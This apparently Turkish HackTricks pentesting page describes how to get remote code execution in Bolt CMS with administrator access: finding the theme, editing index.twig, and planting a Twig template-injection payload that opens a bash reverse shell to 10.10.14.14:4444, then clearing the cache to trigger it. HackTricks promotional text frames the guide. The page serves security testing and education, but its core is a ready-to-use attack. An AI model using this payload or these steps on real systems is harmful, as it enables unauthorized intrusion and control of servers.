Bolt CMS

AWS hackleme konusunda sıfırdan kahramana dönüşmek için htARTE (HackTricks AWS Red Team Expert) öğrenin!

HackTricks'ı desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklam görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız ABONELİK PLANLARI'na göz atın!
Resmi PEASS & HackTricks ürünlerini edinin
PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
Katılın 💬 Discord grubuna veya telegram grubuna veya bizi Twitter 🐦 @carlospolopm'da takip edin.
Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR gönderin.

RCE

Yönetici olarak giriş yaptıktan sonra (giriş ekranına erişmek için /bot yolunu izleyin), Bolt CMS'de RCE alabilirsiniz:

Configuration -> View Configuration -> Main Configuration'ı seçin veya URL yolunu /bolt/file-edit/config?file=/bolt/config.yaml olarak ayarlayın
Tema değerini kontrol edin

File management -> View & edit templates'ı seçin
Önceki adımda bulunan temel temayı seçin (base-2021 bu durumda) ve index.twig'i seçin
Benim durumumda bu, URL yolunda /bolt/file-edit/themes?file=/base-2021/index.twig olarak bulunmaktadır
Payload'ınızı bu dosyaya template injection (Twig) aracılığıyla ayarlayın, örneğin: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
Ve değişiklikleri kaydedin

Maintenance -> Clear the cache'de önbelleği temizleyin
Sayfaya tekrar düzenli bir kullanıcı olarak erişin ve payload'ın çalıştırıldığını görmelisiniz

AWS hackleme konusunda sıfırdan kahramana dönüşmek için htARTE (HackTricks AWS Red Team Expert) öğrenin!

HackTricks'ı desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklam görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız ABONELİK PLANLARI'na göz atın!
Resmi PEASS & HackTricks ürünlerini edinin
PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
Katılın 💬 Discord grubuna veya telegram grubuna veya bizi Twitter 🐦 @carlospolopm'da takip edin.
Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR gönderin.